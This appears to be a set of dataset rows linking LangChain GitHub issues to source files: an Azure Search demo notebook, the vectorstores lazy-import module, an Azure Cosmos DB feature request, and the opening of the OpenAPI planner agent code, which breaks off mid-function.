" 0.82153815),\n",
" (Document(page_content='A former top litigator in private practice. A former federal public defender. And from a family of public school educators and police officers. A consensus builder. Since she’s been nominated, she’s received a broad range of support—from the Fraternal Order of Police to former judges appointed by Democrats and Republicans. \\n\\nAnd if we are to advance liberty and justice, we need to secure the Border and fix the immigration system. \\n\\nWe can do both. At our border, we’ve installed new technology like cutting-edge scanners to better detect drug smuggling. \\n\\nWe’ve set up joint patrols with Mexico and Guatemala to catch more human traffickers. \\n\\nWe’re putting in place dedicated immigration judges so families fleeing persecution and violence can have their cases heard faster. \\n\\nWe’re securing commitments and supporting partners in South and Central America to host more refugees and secure their own borders.', metadata={'source': 'C:\\\\repos\\\\langchain-fruocco-acs\\\\langchain\\\\docs\\\\extras\\\\modules\\\\state_of_the_union.txt'}),\n",
" 0.82153815)]\n"
]
}
],
"source": [
"docs_and_scores = vector_store.similarity_search_with_relevance_scores(query=\"What did the president say about Ketanji Brown Jackson\", k=4, score_threshold=0.80)\n",
"from pprint import pprint\n",
"pprint(docs_and_scores)"
]
},
{
"attachments": {},
"cell_type": "markdown",
"metadata": {},
"source": [
"## Perform a Hybrid Search\n",
"\n",
"Execute hybrid search using the search_type or hybrid_search() method:"
]
},
{
"cell_type": "code",
"execution_count": 13,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"Tonight. I call on the Senate to: Pass the Freedom to Vote Act. Pass the John Lewis Voting Rights Act. And while you’re at it, pass the Disclose Act so Americans can know who is funding our elections. \n",
"\n",
"Tonight, I’d like to honor someone who has dedicated his life to serve this country: Justice Stephen Breyer—an Army veteran, Constitutional scholar, and retiring Justice of the United States Supreme Court. Justice Breyer, thank you for your service. \n",
"\n",
"One of the most serious constitutional responsibilities a President has is nominating someone to serve on the United States Supreme Court. \n",
"\n",
"And I did that 4 days ago, when I nominated Circuit Court of Appeals Judge Ketanji Brown Jackson. One of our nation’s top legal minds, who will continue Justice Breyer’s legacy of excellence.\n"
]
}
],
"source": [
"# Perform a hybrid search\n",
"docs = vector_store.similarity_search(\n",
" query=\"What did the president say about Ketanji Brown Jackson\",\n",
" k=3, \n",
" search_type=\"hybrid\"\n",
")\n",
"print(docs[0].page_content)"
]
},
{
"cell_type": "code",
"execution_count": 14,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"Tonight. I call on the Senate to: Pass the Freedom to Vote Act. Pass the John Lewis Voting Rights Act. And while you’re at it, pass the Disclose Act so Americans can know who is funding our elections. \n",
"\n",
"Tonight, I’d like to honor someone who has dedicated his life to serve this country: Justice Stephen Breyer—an Army veteran, Constitutional scholar, and retiring Justice of the United States Supreme Court. Justice Breyer, thank you for your service. \n",
"\n",
"One of the most serious constitutional responsibilities a President has is nominating someone to serve on the United States Supreme Court. \n",
"\n",
"And I did that 4 days ago, when I nominated Circuit Court of Appeals Judge Ketanji Brown Jackson. One of our nation’s top legal minds, who will continue Justice Breyer’s legacy of excellence.\n"
]
}
],
"source": [
"# Perform a hybrid search\n",
"docs = vector_store.hybrid_search(\n",
" query=\"What did the president say about Ketanji Brown Jackson\", \n",
" k=3\n",
")\n",
"print(docs[0].page_content)"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"# Create a new index with custom filterable fields "
]
},
{
"cell_type": "code",
"execution_count": 18,
"metadata": {},
"outputs": [],
"source": [
"from azure.search.documents.indexes.models import (\n",
" SearchableField,\n",
" SearchField,\n",
" SearchFieldDataType,\n",
" SimpleField,\n",
" ScoringProfile,\n",
" TextWeights,\n",
")\n",
"\n",
"embeddings: OpenAIEmbeddings = OpenAIEmbeddings(deployment=model, chunk_size=1)\n",
"embedding_function = embeddings.embed_query\n",
"\n",
"fields = [\n",
" SimpleField(\n",
" name=\"id\",\n",
" type=SearchFieldDataType.String,\n",
" key=True,\n",
" filterable=True,\n",
" ),\n",
" SearchableField(\n",
" name=\"content\",\n",
" type=SearchFieldDataType.String,\n",
" searchable=True,\n",
" ),\n",
" SearchField(\n",
" name=\"content_vector\",\n",
" type=SearchFieldDataType.Collection(SearchFieldDataType.Single),\n",
" searchable=True,\n",
" vector_search_dimensions=len(embedding_function(\"Text\")),\n",
" vector_search_configuration=\"default\",\n",
" ),\n",
" SearchableField(\n",
" name=\"metadata\",\n",
" type=SearchFieldDataType.String,\n",
" searchable=True,\n",
" ),\n",
" # Additional field to store the title\n",
" SearchableField(\n",
" name=\"title\",\n",
" type=SearchFieldDataType.String,\n",
" searchable=True,\n",
" ),\n",
" # Additional field for filtering on document source\n",
" SimpleField(\n",
" name=\"source\",\n",
" type=SearchFieldDataType.String,\n",
" filterable=True,\n",
" ),\n",
"]\n",
"\n",
"index_name: str = \"langchain-vector-demo-custom\"\n",
"\n",
"vector_store: AzureSearch = AzureSearch(\n",
" azure_search_endpoint=vector_store_address,\n",
" azure_search_key=vector_store_password,\n",
" index_name=index_name,\n",
" embedding_function=embedding_function,\n",
" fields=fields,\n",
")\n"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"# Perform a query with a custom filter"
]
},
{
"cell_type": "code",
"execution_count": 19,
"metadata": {},
"outputs": [],
"source": [
"# Data in the metadata dictionary with a corresponding field in the index will be added to the index\n",
"# In this example, the metadata dictionary contains a title, a source and a random field\n",
"# The title and the source will be added to the index as separate fields, but the random won't. (as it is not defined in the fields list)\n",
"# The random field will be only stored in the metadata field\n",
"vector_store.add_texts(\n",
" [\"Test 1\", \"Test 2\", \"Test 3\"],\n",
" [\n",
" {\"title\": \"Title 1\", \"source\": \"A\", \"random\": \"10290\"},\n",
" {\"title\": \"Title 2\", \"source\": \"A\", \"random\": \"48392\"},\n",
" {\"title\": \"Title 3\", \"source\": \"B\", \"random\": \"32893\"},\n",
" ],\n",
")\n"
]
},
{
"cell_type": "code",
"execution_count": 20,
"metadata": {},
"outputs": [
{
"data": {
"text/plain": [
"[Document(page_content='Test 3', metadata={'title': 'Title 3', 'source': 'B', 'random': '32893'}),\n",
" Document(page_content='Test 1', metadata={'title': 'Title 1', 'source': 'A', 'random': '10290'}),\n",
" Document(page_content='Test 2', metadata={'title': 'Title 2', 'source': 'A', 'random': '48392'})]"
]
},
"execution_count": 12,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"res = vector_store.similarity_search(query=\"Test 3 source1\", k=3, search_type=\"hybrid\")\n",
"res"
]
},
{
"cell_type": "code",
"execution_count": 21,
"metadata": {},
"outputs": [
{
"data": {
"text/plain": [
"[Document(page_content='Test 1', metadata={'title': 'Title 1', 'source': 'A', 'random': '10290'}),\n",
" Document(page_content='Test 2', metadata={'title': 'Title 2', 'source': 'A', 'random': '48392'})]"
]
},
"execution_count": 13,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"res = vector_store.similarity_search(query=\"Test 3 source1\", k=3, search_type=\"hybrid\", filters=\"source eq 'A'\")\n",
"res"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"# Create a new index with a Scoring Profile"
]
},
{
"cell_type": "code",
"execution_count": 22,
"metadata": {},
"outputs": [],
"source": [
"from azure.search.documents.indexes.models import (\n",
" SearchableField,\n",
" SearchField,\n",
" SearchFieldDataType,\n",
" SimpleField,\n",
" ScoringProfile,\n",
" TextWeights,\n",
" ScoringFunction,\n",
" FreshnessScoringFunction,\n",
" FreshnessScoringParameters\n",
")\n",
"\n",
"embeddings: OpenAIEmbeddings = OpenAIEmbeddings(deployment=model, chunk_size=1)\n",
"embedding_function = embeddings.embed_query\n",
"\n",
"fields = [\n",
" SimpleField(\n",
" name=\"id\",\n",
" type=SearchFieldDataType.String,\n",
" key=True,\n",
" filterable=True,\n",
" ),\n",
" SearchableField(\n",
" name=\"content\",\n",
" type=SearchFieldDataType.String,\n",
" searchable=True,\n",
" ),\n",
" SearchField(\n",
" name=\"content_vector\",\n",
" type=SearchFieldDataType.Collection(SearchFieldDataType.Single),\n",
" searchable=True,\n",
" vector_search_dimensions=len(embedding_function(\"Text\")),\n",
" vector_search_configuration=\"default\",\n",
" ),\n",
" SearchableField(\n",
" name=\"metadata\",\n",
" type=SearchFieldDataType.String,\n",
" searchable=True,\n",
" ),\n",
" # Additional field to store the title\n",
" SearchableField(\n",
" name=\"title\",\n",
" type=SearchFieldDataType.String,\n",
" searchable=True,\n",
" ),\n",
" # Additional field for filtering on document source\n",
" SimpleField(\n",
" name=\"source\",\n",
" type=SearchFieldDataType.String,\n",
" filterable=True,\n",
" ),\n",
" # Additional data field for last doc update\n",
" SimpleField(\n",
" name=\"last_update\",\n",
" type=SearchFieldDataType.DateTimeOffset,\n",
" searchable=True,\n",
" filterable=True\n",
" )\n",
"]\n",
"# Adding a custom scoring profile with a freshness function\n",
"sc_name = \"scoring_profile\"\n",
"sc = ScoringProfile(\n",
" name=sc_name,\n",
" text_weights=TextWeights(weights={\"title\": 5}),\n",
" function_aggregation=\"sum\",\n",
" functions=[\n",
" FreshnessScoringFunction(\n",
" field_name=\"last_update\",\n",
" boost=100,\n",
" parameters=FreshnessScoringParameters(boosting_duration=\"P2D\"),\n",
" interpolation=\"linear\"\n",
" )\n",
" ]\n",
")\n",
"\n",
"index_name = \"langchain-vector-demo-custom-scoring-profile\"\n",
"\n",
"vector_store: AzureSearch = AzureSearch(\n",
" azure_search_endpoint=vector_store_address,\n",
" azure_search_key=vector_store_password,\n",
" index_name=index_name,\n",
" embedding_function=embeddings.embed_query,\n",
" fields=fields,\n",
" scoring_profiles = [sc],\n",
" default_scoring_profile = sc_name\n",
")"
]
},
{
"cell_type": "code",
"execution_count": 23,
"metadata": {},
"outputs": [
{
"data": {
"text/plain": [
"['NjQyNTI5ZmMtNmVkYS00Njg5LTk2ZDgtMjM3OTY4NTJkYzFj',\n",
" 'M2M0MGExZjAtMjhiZC00ZDkwLThmMTgtODNlN2Y2ZDVkMTMw',\n",
" 'ZmFhMDE1NzMtMjZjNS00MTFiLTk0MTEtNGRkYjgwYWQwOTI0']"
]
},
"execution_count": 16,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"# Adding same data with different last_update to show Scoring Profile effect\n",
"from datetime import datetime, timedelta\n",
"\n",
"today = datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%S-00:00')\n",
"yesterday = (datetime.utcnow() - timedelta(days=1)).strftime('%Y-%m-%dT%H:%M:%S-00:00')\n",
"one_month_ago = (datetime.utcnow() - timedelta(days=30)).strftime('%Y-%m-%dT%H:%M:%S-00:00')\n",
"\n",
"vector_store.add_texts(\n",
" [\"Test 1\", \"Test 1\", \"Test 1\"],\n",
" [\n",
" {\"title\": \"Title 1\", \"source\": \"source1\", \"random\": \"10290\", \"last_update\": today},\n",
" {\"title\": \"Title 1\", \"source\": \"source1\", \"random\": \"48392\", \"last_update\": yesterday},\n",
" {\"title\": \"Title 1\", \"source\": \"source1\", \"random\": \"32893\", \"last_update\": one_month_ago},\n",
" ],\n",
")\n"
]
},
{
"cell_type": "code",
"execution_count": 24,
"metadata": {},
"outputs": [
{
"data": {
"text/plain": [
"[Document(page_content='Test 1', metadata={'title': 'Title 1', 'source': 'source1', 'random': '10290', 'last_update': '2023-07-13T10:47:39-00:00'}),\n",
" Document(page_content='Test 1', metadata={'title': 'Title 1', 'source': 'source1', 'random': '48392', 'last_update': '2023-07-12T10:47:39-00:00'}),\n",
" Document(page_content='Test 1', metadata={'title': 'Title 1', 'source': 'source1', 'random': '32893', 'last_update': '2023-06-13T10:47:39-00:00'})]"
]
},
"execution_count": 17,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"res = vector_store.similarity_search(query=\"Test 1\", k=3, search_type=\"similarity\")\n",
"res"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": []
}
],
"metadata": {
"kernelspec": {
"display_name": "Python 3.9.13 ('.venv': venv)",
"language": "python",
"name": "python3"
},
"language_info": {
"codemirror_mode": {
"name": "ipython",
"version": 3
},
"file_extension": ".py",
"mimetype": "text/x-python",
"name": "python",
"nbconvert_exporter": "python",
"pygments_lexer": "ipython3",
"version": "3.9.13"
},
"orig_nbformat": 4,
"vscode": {
"interpreter": {
"hash": "645053d6307d413a1a75681b5ebb6449bb2babba4bcb0bf65a1ddc3dbefb108a"
}
}
},
"nbformat": 4,
"nbformat_minor": 2
}
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,627 | Add AzureCosmosDBVectorSearch VectorStore | ### Feature request
### Feature request
Azure Cosmos DB for MongoDB vCore enables users to efficiently store, index, and query high dimensional vector data stored directly in Azure Cosmos DB for MongoDB vCore. It contains similarity measures such as COS (cosine distance), L2 (Euclidean distance) or IP (inner product) which measures the distance between the data vectors and your query vector. The data vectors that are closest to your query vector are the ones that are found to be most similar semantically and retrieved during query time. The accompanying PR would add support for Langchain Python users to store vectors from document embeddings generated from APIs such as Azure OpenAI Embeddings or Hugging Face on Azure.
[Azure Cosmos DB for MongoDB vCore](https://learn.microsoft.com/en-us/azure/cosmos-db/mongodb/vcore/vector-search)
### Motivation
This capability described in the feature request is currently not available for Langchain Python.
### Your contribution
I will be submitting a PR for this feature request. | https://github.com/langchain-ai/langchain/issues/11627 | https://github.com/langchain-ai/langchain/pull/11632 | 28ee6a7c125f1eb209b6b6428d1a50040408ea9f | d0603c86b6dc559799c64033d330075a8744435e | "2023-10-10T20:55:53Z" | python | "2023-10-11T20:56:46Z" | libs/langchain/langchain/vectorstores/__init__.py | """**Vector store** stores embedded data and performs vector search.
One of the most common ways to store and search over unstructured data is to
embed it and store the resulting embedding vectors, and then query the store
and retrieve the data that are 'most similar' to the embedded query.
**Class hierarchy:**
.. code-block::
VectorStore --> <name> # Examples: Annoy, FAISS, Milvus
BaseRetriever --> VectorStoreRetriever --> <name>Retriever # Example: VespaRetriever
**Main helpers:**
.. code-block::
Embeddings, Document
""" # noqa: E501
from typing import Any
from langchain.schema.vectorstore import VectorStore
def _import_alibaba_cloud_open_search() -> Any:
from langchain.vectorstores.alibabacloud_opensearch import AlibabaCloudOpenSearch
return AlibabaCloudOpenSearch
def _import_alibaba_cloud_open_search_settings() -> Any:
from langchain.vectorstores.alibabacloud_opensearch import (
AlibabaCloudOpenSearchSettings,
)
return AlibabaCloudOpenSearchSettings
def _import_elastic_knn_search() -> Any:
from langchain.vectorstores.elastic_vector_search import ElasticKnnSearch
return ElasticKnnSearch
def _import_elastic_vector_search() -> Any:
from langchain.vectorstores.elastic_vector_search import ElasticVectorSearch
return ElasticVectorSearch
def _import_analyticdb() -> Any:
from langchain.vectorstores.analyticdb import AnalyticDB
return AnalyticDB
def _import_annoy() -> Any:
from langchain.vectorstores.annoy import Annoy
return Annoy
def _import_atlas() -> Any:
from langchain.vectorstores.atlas import AtlasDB
return AtlasDB
def _import_awadb() -> Any:
from langchain.vectorstores.awadb import AwaDB
return AwaDB
def _import_azuresearch() -> Any:
from langchain.vectorstores.azuresearch import AzureSearch
return AzureSearch
def _import_bageldb() -> Any:
from langchain.vectorstores.bageldb import Bagel
return Bagel
def _import_cassandra() -> Any:
from langchain.vectorstores.cassandra import Cassandra
return Cassandra
def _import_chroma() -> Any:
from langchain.vectorstores.chroma import Chroma
return Chroma
def _import_clarifai() -> Any:
from langchain.vectorstores.clarifai import Clarifai
return Clarifai
def _import_clickhouse() -> Any:
from langchain.vectorstores.clickhouse import Clickhouse
return Clickhouse
def _import_clickhouse_settings() -> Any:
from langchain.vectorstores.clickhouse import ClickhouseSettings
return ClickhouseSettings
def _import_dashvector() -> Any:
from langchain.vectorstores.dashvector import DashVector
return DashVector
def _import_deeplake() -> Any:
from langchain.vectorstores.deeplake import DeepLake
return DeepLake
def _import_dingo() -> Any:
from langchain.vectorstores.dingo import Dingo
return Dingo
def _import_docarray_hnsw() -> Any:
from langchain.vectorstores.docarray import DocArrayHnswSearch
return DocArrayHnswSearch
def _import_docarray_inmemory() -> Any:
from langchain.vectorstores.docarray import DocArrayInMemorySearch
return DocArrayInMemorySearch
def _import_elasticsearch() -> Any:
from langchain.vectorstores.elasticsearch import ElasticsearchStore
return ElasticsearchStore
def _import_epsilla() -> Any:
from langchain.vectorstores.epsilla import Epsilla
return Epsilla
def _import_faiss() -> Any:
from langchain.vectorstores.faiss import FAISS
return FAISS
def _import_hologres() -> Any:
from langchain.vectorstores.hologres import Hologres
return Hologres
def _import_lancedb() -> Any:
from langchain.vectorstores.lancedb import LanceDB
return LanceDB
def _import_llm_rails() -> Any:
from langchain.vectorstores.llm_rails import LLMRails
return LLMRails
def _import_marqo() -> Any:
from langchain.vectorstores.marqo import Marqo
return Marqo
def _import_matching_engine() -> Any:
from langchain.vectorstores.matching_engine import MatchingEngine
return MatchingEngine
def _import_meilisearch() -> Any:
from langchain.vectorstores.meilisearch import Meilisearch
return Meilisearch
def _import_milvus() -> Any:
from langchain.vectorstores.milvus import Milvus
return Milvus
def _import_momento_vector_index() -> Any:
from langchain.vectorstores.momento_vector_index import MomentoVectorIndex
return MomentoVectorIndex
def _import_mongodb_atlas() -> Any:
from langchain.vectorstores.mongodb_atlas import MongoDBAtlasVectorSearch
return MongoDBAtlasVectorSearch
def _import_myscale() -> Any:
from langchain.vectorstores.myscale import MyScale
return MyScale
def _import_myscale_settings() -> Any:
from langchain.vectorstores.myscale import MyScaleSettings
return MyScaleSettings
def _import_neo4j_vector() -> Any:
from langchain.vectorstores.neo4j_vector import Neo4jVector
return Neo4jVector
def _import_opensearch_vector_search() -> Any:
from langchain.vectorstores.opensearch_vector_search import OpenSearchVectorSearch
return OpenSearchVectorSearch
def _import_pgembedding() -> Any:
from langchain.vectorstores.pgembedding import PGEmbedding
return PGEmbedding
def _import_pgvector() -> Any:
from langchain.vectorstores.pgvector import PGVector
return PGVector
def _import_pinecone() -> Any:
from langchain.vectorstores.pinecone import Pinecone
return Pinecone
def _import_qdrant() -> Any:
from langchain.vectorstores.qdrant import Qdrant
return Qdrant
def _import_redis() -> Any:
from langchain.vectorstores.redis import Redis
return Redis
def _import_rocksetdb() -> Any:
from langchain.vectorstores.rocksetdb import Rockset
return Rockset
def _import_vespa() -> Any:
from langchain.vectorstores.vespa import VespaStore
return VespaStore
def _import_scann() -> Any:
from langchain.vectorstores.scann import ScaNN
return ScaNN
def _import_singlestoredb() -> Any:
from langchain.vectorstores.singlestoredb import SingleStoreDB
return SingleStoreDB
def _import_sklearn() -> Any:
from langchain.vectorstores.sklearn import SKLearnVectorStore
return SKLearnVectorStore
def _import_sqlitevss() -> Any:
from langchain.vectorstores.sqlitevss import SQLiteVSS
return SQLiteVSS
def _import_starrocks() -> Any:
from langchain.vectorstores.starrocks import StarRocks
return StarRocks
def _import_supabase() -> Any:
from langchain.vectorstores.supabase import SupabaseVectorStore
return SupabaseVectorStore
def _import_tair() -> Any:
from langchain.vectorstores.tair import Tair
return Tair
def _import_tencentvectordb() -> Any:
from langchain.vectorstores.tencentvectordb import TencentVectorDB
return TencentVectorDB
def _import_tigris() -> Any:
from langchain.vectorstores.tigris import Tigris
return Tigris
def _import_timescalevector() -> Any:
from langchain.vectorstores.timescalevector import TimescaleVector
return TimescaleVector
def _import_typesense() -> Any:
from langchain.vectorstores.typesense import Typesense
return Typesense
def _import_usearch() -> Any:
from langchain.vectorstores.usearch import USearch
return USearch
def _import_vald() -> Any:
from langchain.vectorstores.vald import Vald
return Vald
def _import_vearch() -> Any:
from langchain.vectorstores.vearch import Vearch
return Vearch
def _import_vectara() -> Any:
from langchain.vectorstores.vectara import Vectara
return Vectara
def _import_weaviate() -> Any:
from langchain.vectorstores.weaviate import Weaviate
return Weaviate
def _import_zep() -> Any:
from langchain.vectorstores.zep import ZepVectorStore
return ZepVectorStore
def _import_zilliz() -> Any:
from langchain.vectorstores.zilliz import Zilliz
return Zilliz
def __getattr__(name: str) -> Any:
if name == "AnalyticDB":
return _import_analyticdb()
elif name == "AlibabaCloudOpenSearch":
return _import_alibaba_cloud_open_search()
elif name == "AlibabaCloudOpenSearchSettings":
return _import_alibaba_cloud_open_search_settings()
elif name == "ElasticKnnSearch":
return _import_elastic_knn_search()
elif name == "ElasticVectorSearch":
return _import_elastic_vector_search()
elif name == "Annoy":
return _import_annoy()
elif name == "AtlasDB":
return _import_atlas()
elif name == "AwaDB":
return _import_awadb()
elif name == "AzureSearch":
return _import_azuresearch()
elif name == "Bagel":
return _import_bageldb()
elif name == "Cassandra":
return _import_cassandra()
elif name == "Chroma":
return _import_chroma()
elif name == "Clarifai":
return _import_clarifai()
elif name == "ClickhouseSettings":
return _import_clickhouse_settings()
elif name == "Clickhouse":
return _import_clickhouse()
elif name == "DashVector":
return _import_dashvector()
elif name == "DeepLake":
return _import_deeplake()
elif name == "Dingo":
return _import_dingo()
elif name == "DocArrayInMemorySearch":
return _import_docarray_inmemory()
elif name == "DocArrayHnswSearch":
return _import_docarray_hnsw()
elif name == "ElasticsearchStore":
return _import_elasticsearch()
elif name == "Epsilla":
return _import_epsilla()
elif name == "FAISS":
return _import_faiss()
elif name == "Hologres":
return _import_hologres()
elif name == "LanceDB":
return _import_lancedb()
elif name == "LLMRails":
return _import_llm_rails()
elif name == "Marqo":
return _import_marqo()
elif name == "MatchingEngine":
return _import_matching_engine()
elif name == "Meilisearch":
return _import_meilisearch()
elif name == "Milvus":
return _import_milvus()
elif name == "MomentoVectorIndex":
return _import_momento_vector_index()
elif name == "MongoDBAtlasVectorSearch":
return _import_mongodb_atlas()
elif name == "MyScaleSettings":
return _import_myscale_settings()
elif name == "MyScale":
return _import_myscale()
elif name == "Neo4jVector":
return _import_neo4j_vector()
elif name == "OpenSearchVectorSearch":
return _import_opensearch_vector_search()
elif name == "PGEmbedding":
return _import_pgembedding()
elif name == "PGVector":
return _import_pgvector()
elif name == "Pinecone":
return _import_pinecone()
elif name == "Qdrant":
return _import_qdrant()
elif name == "Redis":
return _import_redis()
elif name == "Rockset":
return _import_rocksetdb()
elif name == "ScaNN":
return _import_scann()
elif name == "SingleStoreDB":
return _import_singlestoredb()
elif name == "SKLearnVectorStore":
return _import_sklearn()
elif name == "SQLiteVSS":
return _import_sqlitevss()
elif name == "StarRocks":
return _import_starrocks()
elif name == "SupabaseVectorStore":
return _import_supabase()
elif name == "Tair":
return _import_tair()
elif name == "TencentVectorDB":
return _import_tencentvectordb()
elif name == "Tigris":
return _import_tigris()
elif name == "TimescaleVector":
return _import_timescalevector()
elif name == "Typesense":
return _import_typesense()
elif name == "USearch":
return _import_usearch()
elif name == "Vald":
return _import_vald()
elif name == "Vearch":
return _import_vearch()
elif name == "Vectara":
return _import_vectara()
elif name == "Weaviate":
return _import_weaviate()
elif name == "ZepVectorStore":
return _import_zep()
elif name == "Zilliz":
return _import_zilliz()
elif name == "VespaStore":
return _import_vespa()
else:
raise AttributeError(f"Could not find: {name}")
__all__ = [
"AlibabaCloudOpenSearch",
"AlibabaCloudOpenSearchSettings",
"AnalyticDB",
"Annoy",
"Annoy",
"AtlasDB",
"AtlasDB",
"AwaDB",
"AzureSearch",
"Bagel",
"Cassandra",
"Chroma",
"Chroma",
"Clarifai",
"Clickhouse",
"ClickhouseSettings",
"DashVector",
"DeepLake",
"DeepLake",
"Dingo",
"DocArrayHnswSearch",
"DocArrayInMemorySearch",
"ElasticKnnSearch",
"ElasticVectorSearch",
"ElasticsearchStore",
"Epsilla",
"FAISS",
"Hologres",
"LanceDB",
"LLMRails",
"Marqo",
"MatchingEngine",
"Meilisearch",
"Milvus",
"MomentoVectorIndex",
"MongoDBAtlasVectorSearch",
"MyScale",
"MyScaleSettings",
"Neo4jVector",
"OpenSearchVectorSearch",
"OpenSearchVectorSearch",
"PGEmbedding",
"PGVector",
"Pinecone",
"Qdrant",
"Redis",
"Rockset",
"SKLearnVectorStore",
"ScaNN",
"SingleStoreDB",
"SingleStoreDB",
"SQLiteVSS",
"StarRocks",
"SupabaseVectorStore",
"Tair",
"Tigris",
"TimescaleVector",
"Typesense",
"USearch",
"Vald",
"Vearch",
"Vectara",
"VectorStore",
"VespaStore",
"Weaviate",
"ZepVectorStore",
"Zilliz",
"Zilliz",
"TencentVectorDB",
]
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,627 | Add AzureCosmosDBVectorSearch VectorStore | ### Feature request
### Feature request
Azure Cosmos DB for MongoDB vCore enables users to efficiently store, index, and query high dimensional vector data stored directly in Azure Cosmos DB for MongoDB vCore. It contains similarity measures such as COS (cosine distance), L2 (Euclidean distance) or IP (inner product) which measures the distance between the data vectors and your query vector. The data vectors that are closest to your query vector are the ones that are found to be most similar semantically and retrieved during query time. The accompanying PR would add support for Langchain Python users to store vectors from document embeddings generated from APIs such as Azure OpenAI Embeddings or Hugging Face on Azure.
[Azure Cosmos DB for MongoDB vCore](https://learn.microsoft.com/en-us/azure/cosmos-db/mongodb/vcore/vector-search)
### Motivation
This capability described in the feature request is currently not available for Langchain Python.
### Your contribution
I will be submitting a PR for this feature request. | https://github.com/langchain-ai/langchain/issues/11627 | https://github.com/langchain-ai/langchain/pull/11632 | 28ee6a7c125f1eb209b6b6428d1a50040408ea9f | d0603c86b6dc559799c64033d330075a8744435e | "2023-10-10T20:55:53Z" | python | "2023-10-11T20:56:46Z" | libs/langchain/langchain/vectorstores/azure_cosmos_db.py | |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,627 | Add AzureCosmosDBVectorSearch VectorStore | ### Feature request
### Feature request
Azure Cosmos DB for MongoDB vCore enables users to efficiently store, index, and query high dimensional vector data stored directly in Azure Cosmos DB for MongoDB vCore. It contains similarity measures such as COS (cosine distance), L2 (Euclidean distance) or IP (inner product) which measures the distance between the data vectors and your query vector. The data vectors that are closest to your query vector are the ones that are found to be most similar semantically and retrieved during query time. The accompanying PR would add support for Langchain Python users to store vectors from document embeddings generated from APIs such as Azure OpenAI Embeddings or Hugging Face on Azure.
[Azure Cosmos DB for MongoDB vCore](https://learn.microsoft.com/en-us/azure/cosmos-db/mongodb/vcore/vector-search)
### Motivation
This capability described in the feature request is currently not available for Langchain Python.
### Your contribution
I will be submitting a PR for this feature request. | https://github.com/langchain-ai/langchain/issues/11627 | https://github.com/langchain-ai/langchain/pull/11632 | 28ee6a7c125f1eb209b6b6428d1a50040408ea9f | d0603c86b6dc559799c64033d330075a8744435e | "2023-10-10T20:55:53Z" | python | "2023-10-11T20:56:46Z" | libs/langchain/tests/integration_tests/vectorstores/test_azure_cosmos_db.py | |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 2,938 | Allow OpenAPI planner to respect URLs with placeholders | In OpenAPI documentation, an endpoint might include a placeholder for a parameter:
```
GET /states/{abbr}
```
Currently, exact matches are needed with OpenAPI Planner to retrieve documentation. In the example above, `GET /states/FL` would receive a `ValueError(f"{endpoint_name} endpoint does not exist.")`.
| https://github.com/langchain-ai/langchain/issues/2938 | https://github.com/langchain-ai/langchain/pull/2940 | e42a576cb2973e36f310e1db45d75b8fa5ba9cf6 | 48cf9783913077fdad7c26752c7a70b20b57fb30 | "2023-04-15T13:54:15Z" | python | "2023-10-12T23:20:32Z" | libs/langchain/langchain/agents/agent_toolkits/openapi/planner.py | """Agent that interacts with OpenAPI APIs via a hierarchical planning approach."""
import json
import re
from functools import partial
from typing import Any, Callable, Dict, List, Optional
import yaml
from langchain.agents.agent import AgentExecutor
from langchain.agents.agent_toolkits.openapi.planner_prompt import (
API_CONTROLLER_PROMPT,
API_CONTROLLER_TOOL_DESCRIPTION,
API_CONTROLLER_TOOL_NAME,
API_ORCHESTRATOR_PROMPT,
API_PLANNER_PROMPT,
API_PLANNER_TOOL_DESCRIPTION,
API_PLANNER_TOOL_NAME,
PARSING_DELETE_PROMPT,
PARSING_GET_PROMPT,
PARSING_PATCH_PROMPT,
PARSING_POST_PROMPT,
PARSING_PUT_PROMPT,
REQUESTS_DELETE_TOOL_DESCRIPTION,
REQUESTS_GET_TOOL_DESCRIPTION,
REQUESTS_PATCH_TOOL_DESCRIPTION,
REQUESTS_POST_TOOL_DESCRIPTION,
REQUESTS_PUT_TOOL_DESCRIPTION,
)
from langchain.agents.agent_toolkits.openapi.spec import ReducedOpenAPISpec
from langchain.agents.mrkl.base import ZeroShotAgent
from langchain.agents.tools import Tool
from langchain.callbacks.base import BaseCallbackManager
from langchain.chains.llm import LLMChain
from langchain.llms.openai import OpenAI
from langchain.memory import ReadOnlySharedMemory
from langchain.prompts import PromptTemplate
from langchain.pydantic_v1 import Field
from langchain.schema import BasePromptTemplate
from langchain.schema.language_model import BaseLanguageModel
from langchain.tools.base import BaseTool
from langchain.tools.requests.tool import BaseRequestsTool
from langchain.utilities.requests import RequestsWrapper
#
# Requests tools with LLM-instructed extraction of truncated responses.
#
# Of course, truncating so bluntly may lose a lot of valuable
# information in the response.
# However, the goal for now is to have only a single inference step.
MAX_RESPONSE_LENGTH = 5000
"""Maximum length of the response to be returned."""
def _get_default_llm_chain(prompt: BasePromptTemplate) -> LLMChain:
return LLMChain(
llm=OpenAI(),
prompt=prompt,
)
def _get_default_llm_chain_factory(
prompt: BasePromptTemplate,
) -> Callable[[], LLMChain]:
"""Returns a default LLMChain factory."""
return partial(_get_default_llm_chain, prompt)
class RequestsGetToolWithParsing(BaseRequestsTool, BaseTool):
"""Requests GET tool with LLM-instructed extraction of truncated responses."""
name: str = "requests_get"
"""Tool name."""
description = REQUESTS_GET_TOOL_DESCRIPTION
"""Tool description."""
response_length: Optional[int] = MAX_RESPONSE_LENGTH
"""Maximum length of the response to be returned."""
llm_chain: LLMChain = Field(
default_factory=_get_default_llm_chain_factory(PARSING_GET_PROMPT)
)
"""LLMChain used to extract the response."""
def _run(self, text: str) -> str:
try:
data = json.loads(text)
except json.JSONDecodeError as e:
raise e
data_params = data.get("params")
response = self.requests_wrapper.get(data["url"], params=data_params)
response = response[: self.response_length]
return self.llm_chain.predict(
